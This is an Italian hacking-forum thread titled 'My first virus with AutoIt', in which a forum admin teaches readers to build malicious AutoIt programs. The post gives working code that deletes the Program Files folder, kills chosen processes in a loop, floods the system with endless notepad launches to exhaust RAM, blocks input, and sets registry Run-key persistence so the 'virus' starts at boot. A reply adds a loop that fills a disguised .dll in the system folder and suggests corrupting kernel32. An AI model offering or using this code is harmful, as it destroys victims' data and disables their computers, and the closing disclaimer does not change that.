Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CalendarioCalendario  FAQFAQ  CercaCerca  RegistratiRegistrati  Lista UtentiLista Utenti  GruppiGruppi  Accedi  

Condividi | 
 

 Il mio primo virus con autoit

Andare in basso 
AutoreMessaggio
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Il mio primo virus con autoit   Lun Lug 30, 2007 6:56 pm

IL MIO PRIMO VIRUS
Se avete letto il tutorial di DarkJoker conoscete abbastanza approssimativamente il linguaggio
di programmazione Autoit.
Dovete sapere che questo è utilissimo anche per creare dei virus più o meno potenti.
Quello che dobbiamo fare è semplicemente usare delle funzioni del linguaggio che possono
danneggiare il computer se usate in un certo modo,
Iniziamo da una funzione semplicissima: BlockInput
[code ]BlockInput(1)[/code]
BlockInput blocca l'input di tastiera e mouse in modo da non permettere più all'utente di fare
nulla.
Purtroppo questa funzione ha un grosso bug, e appena l'utente preme la combinazione di tasti
CTRL-ALT-CANC(come fa la maggior parte delle persone quando c'è un problema) e quindi è
pressochè inutile, ma serve a rendere l'idea di cosa si può fare con questa linguaggio.
Vediamo ora le funzioni migliori per creare virus..
Cominciamo con quelle che gestiscono i file:
Codice:
FileOpen(apre un file di lettura)
FileCopy(copia un file)
FileMove(sposta un file)
FileDelete(cancella un file)
Quella che ci serve è FileDelete, perchè permette appunto di cancellare dei dati da un
computer
Codice:
FileDelete("C:\Programmi\*.*")
Questo semplice virus cancella tutti i file nella cartella "Programmi" del computer.(* indica tutti i tipi esistenti quindi * = tutti i nomi . * = tutti i formati.
esiste anche il comando dirdelete che cancella direttamente tutta la cartella:

Codice:

Dirdelete ("C:\Programmai")

Attraverso questa funzione potrete creare virus che cancellano file importanti dai
computer(ricordate comunque che i file veramente importanti, come quelli di sistema, non si
possono cancellare, ma potete comunque creare un dispiacere notevole in chi apre questo tipo di virus)
Altre funzioni utilissime sono quelle che controllano i processi:
Codice:
ProcessExists(controlla l'esistenza di un processo)
ProcessClose(chide il processo)
Se avete letto il tutorial di darkjoker su autoit conoscete già l'utilizzo di cicli while e condizioni if,
che abbinati a queste funzioni possono bloccare completamente programmi)
Codice:
While 1 = 1
If ProcessExists("notepad.exe") Then
ProcessClose("notepad.exe")
EndIf
Wend
ovvero
Codice:
Finchè 1= 1(sempre)
Se esiste il processo "notepad.exe" Allora
Chiudilo
Fine della condizione if
Fine del ciclo while
In questo modo potrete dire addio al blocco note di windows finchè questo virus è in
esecuzione. e se al posto di "notepad" mettete il nome del processo dell'applicazione che volete bloccare( il nome si può vedere tramite il task manager, click col tasto destro sul
programma, "Vai al processo) avete bloccato il programma.
Potete anche bloccare il computer dicendogli di fare troppe cose in una volta, per esempio di
aprire all'infinito il blocco note:
Codice:
While 1 = 1
Run("notepad.exe")
WEnd
La funzione Run unita con il while fa aprire all'infinito il blocco note di windows, finchè il
computer finisce la RAM e va completamente in panne...
Ora la funzione più importante di tutte è il RegWrite, che permette di scrivere nel registro di
sistema. In questo modo possiamo dire a windows che ogni volta che si accende il computer
deve aprire il virus. così non ci sarà più niente da fare per chi è colpito dal virus!!!!
Codice:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dkcd", "REG_SZ", "C:\djcd.exe")
Questo semplice programma dice al computer che ogni volta che si accendere di aprire il virus
chiamato "djcd.exe", salvato nella cartella C:\del computer.
Così potrte installare un virus in un computer semplicemente creandolo, salvandolo in una
cartella del computer e poi creare un'altro programma come questo che dice al computer di
aprire il virus ad ogni avvio. La voce che dovrete cambiare è l'ultima, quella del percorso,( a meno che non chiamiate il virus proprio djcd e lo salviate nel percorso C:\ )
Se comunque non avete capito bene quest'ultima parte potrete chiedere maggiori informazioni sul forum.....
Mi raccomando, usate queste informazioni senza arrecare danno ai computer!!!
CertainDeath
xhacking@yahoo.it
Torna in alto Andare in basso
Visualizza il profilo
Ale4ever
apprendista
apprendista
avatar

Numero di messaggi : 33
Data d'iscrizione : 13.09.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Gio Set 13, 2007 10:04 pm

Ciao CertainDeath... Ti sembrerà una cosa stupida, ma io non ho capito come funziona il blockimput... Cioè io ho provato a inserirlo in un programma, scrivendo semplicemente:
Codice:
 BlockImput (1)
però non mi funziona... L'imput della tastiera e del mouse sono perfetti... Ho sbagliato io qualcosa?

Grazie per gli aiuti...
Ciauz!
Torna in alto Andare in basso
Visualizza il profilo
Ale4ever
apprendista
apprendista
avatar

Numero di messaggi : 33
Data d'iscrizione : 13.09.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Gio Set 13, 2007 10:16 pm

Niente ho risolto... Scusate la mia stupidità... Bastava inserirlo in un ciclo While... Scusate ancora...



Ciauz!
Torna in alto Andare in basso
Visualizza il profilo
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Ven Set 14, 2007 5:54 pm

Bravo!
Hai trovato la soluzione da solo...
Purtroppo la funzione BlockInput basta premere CTRL-ALT-CANC e tutto torna come prima(questo è specificato anche nel file help se cerchi "BlockInput")...
Ma ovviamente con il ciclo while è tutta un'altra cosa.
Torna in alto Andare in basso
Visualizza il profilo
wowo
apprendista
apprendista
avatar

Numero di messaggi : 34
Data d'iscrizione : 26.10.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Mar Ott 30, 2007 8:17 pm

aaa


Ultima modifica di il Ven Gen 11, 2008 10:34 am, modificato 1 volta
Torna in alto Andare in basso
Visualizza il profilo
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Gio Nov 01, 2007 5:10 pm

beh, non so. forse...
comunque vedo che il tuo obbiettivo è sempre quello di intasare l'hard disk...
Torna in alto Andare in basso
Visualizza il profilo
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: Il mio primo virus con autoit   Ven Nov 02, 2007 5:44 pm

per creaer un nuovo file devi, pero':
Codice:

#include <File.au3>
_FileCreate ("Nomefile")
non ho capito una cosa:
se tu vuoi intasare un'hard disk, non dovresti fare:
Codice:

#NoTrayIcon
FileOpen (@systemdir& "path.dll", 1)
while 1
$rand = Random (0, 999999999)
FileWriteLine (@systemdir& "path.dll", $rand)
wend
???
cosi crei un file che si nasconde sotto una dll, e gli scrive all'infinito un numero random?
ps: se vuoi puoi rendere inutilizzabile o modificare a piacimento anche il kernel32 o dll inportanti, scrivendogli dentro...

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo
Contenuto sponsorizzato




MessaggioTitolo: Re: Il mio primo virus con autoit   

Torna in alto Andare in basso
 
Il mio primo virus con autoit
Torna in alto 
Pagina 1 di 1
 Argomenti simili
-
» [Guida] Come agire il primo giorno di scuola superiore all'ITIS Castelli - Brescia
» Nuovo virus della "Polizia Postale". Spiegazione su cosa realmente è, e come rimuoverlo.
» Widget per la scansione di virus in una pagina web
» Che cosa è il file mrtstub.exe?
» Storia dei carri armati

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
Xhack :: Programmazione :: Autoit-
Vai verso: